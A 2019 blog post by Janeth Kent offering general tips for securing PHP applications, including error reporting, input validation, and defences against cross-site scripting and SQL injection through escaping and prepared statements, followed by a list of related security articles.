Tips to Create Secure Php Applications

by Janeth Kent Date: 29-06-2019 php xss tips sql security injection

PHP is one of the most popular programming languages for the web. Such languages are very helpful for the programmer but the security holes in it can create a problem. They can create problems in the development path.Below are few tips to help you avoid some common PHP security pitfalls and development bug.

1. Use of Proper Error Reporting

Error reporting can be your best friend during the development process. Error reports helps you to find spelling mistakes in your variables and also detect incorrect function usage. Always make sure that you hide all the error reporting once you decide to make the site live.

This can be done by invoking the simple function “error_reporting(0)” at the top of your application file(s).

You should always make sure to log your errors to a protected file. Which help to detect the problem when something go wrong. Therefore, This can be done with the PHP function “set_error_handler”.

2. Disable PHP’s harmful Features

PHP’s creators have always included some features to make PHP development easier. Some of these helpful features can have unintended consequences.
We can call these as “bad features” because they have allowed data validation and created a path for bugs to finding their way into scripts. One of
the first things you should do when the development process begins is
disable certain of these features. Depending on the host which you are using, these may or may not be turned off for you. If you are developing on your own computer or any local environment, they probably won’t be turned off. Some of these features have also been removed in the upcoming PHP6, but are ubiquitous in PHP4 applications and are only deprecated in PHP5 applications.

3. Validate Input

With addition to escaping characters, another good way to protect input is to validate it. Normally you actually know what kind of data you are expecting on input.  So the simplest way to protect yourself against attacks is to make sure your users can only enter the appropriate data.

4. Watch for Cross Site Scripting (XSS) Attacks in User Input

A web application usually accepts input from users and displays it
in some way. They can be in a wide variety of forms. When accepting input, allowing HTML can be a dangerous thing,because that allows for JavaScript to be executed in unintended ways. If even one hole is left open, JavasScript can be executed and cookies could be hijacked. This cookie data could then be used to fake a real account and give an illegal user access to the website’s data. There are a some ways you can protect your site from such attacks. One way is to disallow HTML altogether, because then there is no possible way to allow any JavaScript to execute.

5. Protecting against SQL Injection

SQL injection attacks occur when data is not checked, and the application doesn’t escape characters used in SQL strings such as single quotes (‘) or double quotes (“). If these characters are not filtered out users can disturb the system by making queries always true and which allow them to trick  login systems.

MySQLi help protect your database input. We can do it in 2 ways.

Either with the mysqli_real_escape_string function when connected to a server or with prepared statements.

Prepared statements are a method of separating SQL logic from the data being passed to it. The functions used within the MySQLi library filter the input for us when we bind variables to the prepared statement.



by Janeth Kent Date: 29-06-2019 php xss tips sql security injection hits : 4141  
Janeth Kent

Janeth Kent

Licenciada en Bellas Artes y programadora por pasión. Cuando tengo un rato retoco fotos, edito vídeos y diseño cosas. El resto del tiempo escribo en MA-NO WEB DESIGN END DEVELOPMENT.


Related Posts

A beginner’s guide to software vulnerabilities

What are software vulnerabilities The number of devices connected to the Internet is growing every day. And among those devices we find not only computers and smartphones, but also an ever-rising…

The BleedingTooth vulnerability and other Bluetooth security risks

Have you ever heard of BleedingTooth? And we do not mean the really disturbing looking mushroom which goes by this name and is totally real (we double checked) but one of…

How to watch deleted or private Youtube videos

Today we are going to talk about the technique which you permit to be able to recover videos from Youtube that was deleted, made private or simply blocked by Youtube…

Network and port scanning with Zenmap

This article goes out to all the computer nerds who are, when it comes to networking, more on the noob-side of the crowd. It does not have to be complicated…

HTTP Cookies: how they work and how to use them

Today we are going to write about the way to store data in a browser, why websites use cookies and how they work in detail. Continue reading to find out how…

Google Dorks: How to find interesting data and search like hacker

Go the words Google and Hacking together? Well if you thought that we will learn how to use hack Google, you might be wrong. But we can Use Google search engine…

How to block any website with a password from your browser

We are going to explain how to block any website with a password from your browser, and for this purpose we are going to use an extension called Block Site.…

Double VPN: what it is and how it works

Privacy on the web is a very important factor for users and there are more and more tools to help us maintain it. Without a doubt VPN services have had…

How to securely access the Dark Web in 15 steps. Second part

Let's continue with the 2nd part of our article in which we try to give you some advice on how to safely and securely explore the dark web. Let's restart from…

How to securely access the Dark Web in 15 steps. First part

The dark web can be a pretty dangerous place if you don't take the right precautions. You can stay relatively safe with a good antivirus and a decent VPN. However,…

How to Browse the Internet Anonymously: 6 tips

Most of the actions you take online are not as private as you might imagine. Nowadays, countless people and groups try to follow our online behaviour as closely as possible. Our…

Mobile cryptophones on the market (legals)

As we have said, it is a market often at the borders of legality, also because these devices are particularly used by criminals. Some models, however, are also available through…

We use our own and third-party cookies to improve our services, compile statistical information and analyze your browsing habits. This allows us to personalize the content we offer and to show you advertisements related to your preferences. By clicking "Accept all" you agree to the storage of cookies on your device to improve website navigation, analyse traffic and assist our marketing activities. You can also select "System Cookies Only" to accept only the cookies required for the website to function, or you can select the cookies you wish to activate by clicking on "settings".

Accept All Only sistem cookies Configuration